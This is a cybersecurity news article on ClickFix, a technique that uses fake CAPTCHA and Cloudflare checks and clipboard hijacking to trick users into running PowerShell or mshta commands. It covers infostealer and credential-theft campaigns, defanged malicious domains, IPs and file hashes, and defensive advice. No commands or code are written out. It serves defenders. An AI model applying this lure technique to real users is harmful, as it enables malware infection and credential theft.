ClickFix, a browser-based delivery technique, has emerged as a growing threat in the cybersecurity landscape.
This method employs deceptive prompts and clipboard hijacking to trick users into executing malicious commands.
Often disguised as system alerts or CAPTCHA challenges, these web pages lure users into clicking buttons that silently stage payloads for execution.
Diverse Malware Deployment and Credential Theft
Cybercriminals and advanced actors have adopted ClickFix to deploy various types of malware, with information stealers being the most common.
These are typically delivered via mshta.exe, PowerShell, or embedded JavaScript.
Recent investigations have uncovered multiple live domains serving malicious content using this technique.
One example involves a Bitcoin-themed domain posing as a Cloudflare Web Application Firewall (WAF) to deliver Lumma and CryptBot malware.
The site, soubtcevent[.]com, presents a CAPTCHA-style verification page followed by a fake Cloudflare WAF check.
Upon user interaction, it executes a Base64-encoded PowerShell script that downloads malicious executables.
Another variant targets Zoho Office Suite credentials. The domain timestesol[.]com displays a “Webmail Sign-in” page with a robot verification prompt.
After interacting with the verification button, users are redirected to a fake Zoho login page.
The entered credentials are then sent to an actor-controlled endpoint via a hardcoded Telegram bot token.
Fileless Payload Delivery and Compromised Infrastructure
ClickFix has also been observed using compromised infrastructure to deliver fileless PowerShell payloads.
In one instance, a compromised website at riverview-pools[.]com copied a PowerShell command to the user’s clipboard upon clicking a verification prompt.
According to Hunt, this command attempted to retrieve and execute additional scripts from other potentially compromised websites.
To reduce exposure to ClickFix-style attacks, security experts recommend monitoring for clipboard-based execution involving PowerShell, mshta.exe, or Base64-encoded commands.
Defenders should also alert on or block access to domains hosting verification-style lures that mimic CAPTCHA challenges or security checks.
Deploying endpoint detection tools configured to log PowerShell activity, script-based execution, and unusual clipboard use is crucial.
Additionally, encouraging users to enroll in multi-factor authentication (MFA) can help mitigate the impact of potential credential harvesting campaigns[1].
Indicators of Compromise (IoCs)
Several domains and IP addresses have been identified as part of the ClickFix infrastructure.
Notable examples include soubtcevent[.]com (94.181.229[.]250), informepartne[.]com (104.21.60[.]15), and securedmicrosoft365[.]com (20.217.17[.]201).
File-based IoCs include malicious executables such as verify1.exe (SHA-256: dad4ecd247efa876faac2e3f67130951b044043ca21c5db6281ba2b8fce7a089) and verify2.exe (SHA-256: 69c513f0ddf4416e0d47f778594fd76b96424359c7e9c2e5585ad0abaaf5dbc0)[1].
As ClickFix continues to evolve, organizations must remain vigilant and adapt their security measures to counter this deceptive and potentially devastating threat.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates
